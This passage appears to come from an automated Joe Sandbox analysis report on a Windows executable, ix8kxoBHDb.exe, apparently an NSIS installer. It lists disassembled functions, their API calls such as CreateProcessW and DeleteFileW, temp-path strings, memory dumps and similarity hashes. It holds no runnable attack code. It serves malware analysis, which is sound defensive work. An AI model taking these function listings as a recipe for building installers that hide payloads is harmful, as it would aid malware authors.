Instruction Fuzzy Hash: 1F312272504109DFEB269F50CAD4F2E7FBAFB86308B244139F5469B964EB309808CF21

Function 004028AD Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
GlobalFree.KERNEL32(?), ref: 00402956
GlobalFree.KERNEL32(00000000), ref: 00402969
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
Instruction ID: fa73a2a76dd28b4b8719808dd60f9f08d060129827b0ffc87b4efdc8f5ae5e12
Opcode Fuzzy Hash: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
Instruction Fuzzy Hash: 3D21BFB1D00124BBCF116FA5DE48D9E7E79EF09364F10023AF9607A2E1CB794D418B98

Function 00404C0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
wsprintfW.USER32 ref: 00404CB6
SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9

Strings

(7B, xrefs: 00404C9F
%u.%u%s%s, xrefs: 00404C97

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$(7B
API String ID: 3540041739-1320723960
Opcode ID: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
Opcode Fuzzy Hash: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8

Function 00402598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3

Strings

C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp, xrefs: 004025E1
C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll, xrefs: 004025B3, 004025DA, 004025EE, 0040263A

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp$C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll
API String ID: 3109718747-937194633
Opcode ID: 43ad42b55247376bb2ab46c00e326ba01da809c0ffe6f982d396e576083aa9ce
Instruction ID: c13fbae436403556d6c48d38c5ac6db5007ae9437622b5a65b164b2cac9ab4a1
Opcode Fuzzy Hash: 43ad42b55247376bb2ab46c00e326ba01da809c0ffe6f982d396e576083aa9ce
Instruction Fuzzy Hash: FB110B72A00301BADB106BB18E8999F7664AF44359F20443BF502F21D0D9FC89416B5E

Function 73B018D9 Relevance: 7.7, APIs: 5, Instructions: 194COMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(?), ref: 73B0193A
GlobalFree.KERNEL32(?), ref: 73B01ADA
GlobalFree.KERNEL32(?), ref: 73B01ADF

Memory Dump Source

Source File: 00000000.00000002.1483517567.0000000073B01000.00000020.00000001.01000000.00000005.sdmp, Offset: 73B00000, based on PE: true

Associated: 00000000.00000002.1483495722.0000000073B00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1483809646.0000000073B04000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1483843847.0000000073B06000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73b00000_ix8kxoBHDb.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: a33ce1b045185d14298839372fbc6977dad1003ff80bcc87838890f2a16fa0a6
Instruction ID: f7106eb37a8759176d4b4d20e8472a124f67e82fd43be1f6809be1d09d560cde
Opcode Fuzzy Hash: a33ce1b045185d14298839372fbc6977dad1003ff80bcc87838890f2a16fa0a6
Instruction Fuzzy Hash: B851067ED001599FDB0E9FA485C07AE7EBAEBC4350F048279D426B3285F6709E8187A1

Function 73B02394 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 73B024D6

Part of subcall function 73B0122C: lstrcpynW.KERNEL32(00000000,?,73B012DF,00000019,73B011BE,-000000A0), ref: 73B0123C

GlobalAlloc.KERNEL32(00000040), ref: 73B0245C
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 73B02477

Memory Dump Source

Source File: 00000000.00000002.1483517567.0000000073B01000.00000020.00000001.01000000.00000005.sdmp, Offset: 73B00000, based on PE: true

Associated: 00000000.00000002.1483495722.0000000073B00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1483809646.0000000073B04000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1483843847.0000000073B06000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73b00000_ix8kxoBHDb.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: 5d2cb61744ab9667ec3595d4674f7ce4232c9501b894f5290af06a68be2987cc
Instruction ID: a06de46e6b8e1565a5453e07d338a0d43adefb494062f7e6fa84deea3ccb60a5
Opcode Fuzzy Hash: 5d2cb61744ab9667ec3595d4674f7ce4232c9501b894f5290af06a68be2987cc
Instruction Fuzzy Hash: D74181B1408309EFE725DF61D984B2A7FB8EB98314F10453EE54A8B991FB70A548CB61

Function 73B0161D Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,73B021EC,?,00000808), ref: 73B01635
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,73B021EC,?,00000808), ref: 73B0163C
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,73B021EC,?,00000808), ref: 73B01650
GetProcAddress.KERNEL32(73B021EC,00000000), ref: 73B01657
GlobalFree.KERNEL32(00000000), ref: 73B01660

Memory Dump Source

Source File: 00000000.00000002.1483517567.0000000073B01000.00000020.00000001.01000000.00000005.sdmp, Offset: 73B00000, based on PE: true

Associated: 00000000.00000002.1483495722.0000000073B00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1483809646.0000000073B04000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1483843847.0000000073B06000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73b00000_ix8kxoBHDb.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: d2bc816708d0ca30a619b8f3c8ab74436dc37ffa4a4e3d0b3b22b0887d5ce17e
Instruction ID: 620dcab6d714dedf128c2f4ff1cc0e5ef040a1341b2f25b8414150222d6809aa
Opcode Fuzzy Hash: d2bc816708d0ca30a619b8f3c8ab74436dc37ffa4a4e3d0b3b22b0887d5ce17e
Instruction Fuzzy Hash: 7DF012731061387BD63126A78E4CD9B7E9CDF9B2F9B110211F71CA21A095614C01DBF1

Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D63
GetClientRect.USER32(00000000,?), ref: 00401D70
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
DeleteObject.GDI32(00000000), ref: 00401DAE

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
Opcode Fuzzy Hash: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38

Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7

Strings

!, xrefs: 00401C5B

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18

Function 00405CBD Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,756F3420,004036EF,?,00000006,00000008,0000000A), ref: 00405CC3
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,756F3420,004036EF,?,00000006,00000008,0000000A), ref: 00405CCD
lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405CDF

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405CBD

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-1881609536
Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
Instruction ID: 595fb0ef6d3bfc82903baa2f142a0de03b6946227050b98ce465681b6cfad29b
Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
Instruction Fuzzy Hash: AED0A771101630AAC111AB448D04CDF63ACEE45304342003BF601B70A2CB7C1D6287FD

Function 00405DC5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5

Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,756F2EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,756F2EE0,00000000), ref: 00405D76
Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93

lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,?,?,756F2EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,756F2EE0,00000000), ref: 00405E1E
GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,?,?,756F2EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,756F2EE0), ref: 00405E2E

Strings

0_B, xrefs: 00405DCB

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: 0_B
API String ID: 3248276644-2128305573
Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE

Function 004053C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 004053F3
CallWindowProcW.USER32(?,?,?,?), ref: 00405444

Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD

Strings

, xrefs: 004053D4

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E

Function 004059D1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
CloseHandle.KERNEL32(?), ref: 00405A07

Strings

Error launching installer, xrefs: 004059E4

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C

Function 00403A43 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,756F2EE0,00403A1A,756F3420,00403819,00000006,?,00000006,00000008,0000000A), ref: 00403A5D
GlobalFree.KERNEL32(?), ref: 00403A64

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403A55

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-1881609536
Opcode ID: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
Instruction ID: 7abb624b42f0eb5bf3103b67fd66c27476adae564a61ccebc81435f3e7eba37d
Opcode Fuzzy Hash: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
Instruction Fuzzy Hash: 73E0EC326111205BC6229F59AD44B5E776D6F58B22F0A023AE8C07B26087745D938F98

Function 00405D09 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402F9C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ix8kxoBHDb.exe,C:\Users\user\Desktop\ix8kxoBHDb.exe,80000000,00000003), ref: 00405D0F
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F9C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ix8kxoBHDb.exe,C:\Users\user\Desktop\ix8kxoBHDb.exe,80000000,00000003), ref: 00405D1F

Strings

C:\Users\user\Desktop, xrefs: 00405D09

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-4267323751
Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
Instruction ID: 65148869c9b5617484fe42b3676c909fd92059a2a8224d2a454660f99163d925
Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
Instruction Fuzzy Hash: A3D0A7B7410920EAD3126B04DC04D9F73ACEF51300B46843BE840A7171D7785CD18BEC

